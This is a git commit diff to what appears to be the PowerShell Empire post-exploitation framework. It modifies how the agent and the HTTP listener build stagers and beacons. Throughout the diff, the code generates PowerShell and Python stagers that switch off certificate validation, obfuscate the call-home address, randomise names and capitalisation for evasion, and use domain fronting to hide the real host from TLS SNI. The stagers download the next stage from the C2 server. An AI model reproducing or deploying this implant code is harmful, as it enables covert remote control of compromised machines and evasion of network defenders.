Fix for 1142 complete

fix-for-1142
chris 2018-06-04 22:17:03 -04:00
parent 516a7d8c1b
commit f9018fc637
3 changed files with 60 additions and 26 deletions

View File

@ -140,7 +140,6 @@ function Invoke-Empire {
# keep track of all background jobs
# format: {'RandomJobName' : @{'Alias'=$RandName; 'AppDomain'=$AppDomain; 'PSHost'=$PSHost; 'Job'=$Job; 'Buffer'=$Buffer}, ... }
$Script:Jobs = @{}
$Script:Downloads = @{}
# the currently imported script held in memory
$script:ImportedScript = ''

View File

@ -111,14 +111,17 @@ function Start-Negotiate {
if ($customHeaders -ne "") {
$headers = $customHeaders -split ',';
$headers | ForEach-Object {
$headerKey = $_.split(':')[0];
$headerValue = $_.split(':')[1];
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if ($headerKey -eq "host"){
try{$ig=$WC.DownloadData($s)}catch{}};
$headerKey = $($_ -split ':')[0];
$headerValue = $($_ -split ':')[1];
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if ($headerKey -eq "host"){
try{$ig=$WC.DownloadData($s)}catch{};
}
$wc.Headers.Add($headerKey, $headerValue);
}
}
$wc.Headers.Add("User-Agent",$UA);
@ -214,10 +217,12 @@ function Start-Negotiate {
$headers | ForEach-Object {
$headerKey = $_.split(':')[0];
$headerValue = $_.split(':')[1];
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if ($headerKey -eq "host"){
try{$ig=$WC.DownloadData($s)}catch{}};
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if ($headerKey -eq "host"){
try{$ig=$WC.DownloadData($s)}catch{};
}
$wc.Headers.Add($headerKey, $headerValue);
}
}

View File

@ -334,13 +334,9 @@ class Listener:
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
stager += "'User-Agent',$u);"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
@ -393,6 +389,7 @@ class Listener:
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';"
cookieString = "{}={};".format(cookie, b64RoutingPacket)
#Add custom headers if any
if customHeaders != []:
@ -404,12 +401,16 @@ class Listener:
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser)}catch{};")
if headerKey.lower() == "cookie":
cookieString += "{};".format(headerValue)
continue
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket)
stager += "\"Cookie\",\"%s\");" % (cookieString)
stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
@ -461,16 +462,24 @@ class Listener:
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header('Cookie',\"%s=%s\");\n" % (cookie,b64RoutingPacket)
cookieString = "{}={};".format(cookie,b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
if headerKey.lower() == "cookie":
cookieString += "{};".format(headerValue)
continue
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
launcherBase += "req.add_header('Cookie',\"%s\");\n" % (cookieString)
if proxy.lower() != "none":
if proxy.lower() == "default":
@ -722,6 +731,20 @@ class Listener:
This is so agents can easily be dynamically updated for the new listener.
"""
profile = listenerOptions['DefaultProfile']['Value']
customHeaders = profile.split('|')[2:]
cookieString = ""
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
if headerKey.lower() == "cookie":
cookieString += "{};".format(headerValue)
if language:
if language.lower() == 'powershell':
@ -743,6 +766,13 @@ class Listener:
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
#if there is an additional custom cookie value, add it to the webclient object.
if($script:Headers['Cookie'] -ne $null) {
$cookieValueString = "$RoutingCookie;$($script:Headers['Cookie']);"
}
else {
$cookieValueString = $RoutingCookie
}
# build the web request object
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
@ -755,7 +785,8 @@ class Listener:
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Cookie",\"""" + cookie + """=$RoutingCookie")
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Cookie",\"""" + cookie + """=$cookieValueString")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
@ -797,7 +828,6 @@ class Listener:
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
@ -847,7 +877,7 @@ def send_message(packets=None):
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket)
headers['Cookie'] = \"""" + cookie + """=%s" % (b64routingPacket)
headers['Cookie'] = \"""" + cookie + """=%s;{}" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
@ -861,7 +891,7 @@ def send_message(packets=None):
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
pass
return (HTTPError.code, '')
@ -871,7 +901,7 @@ def send_message(packets=None):
return (URLerror.reason, '')
return ('', '')
"""
""".format(cookieString)
return updateServers + sendMessage
else: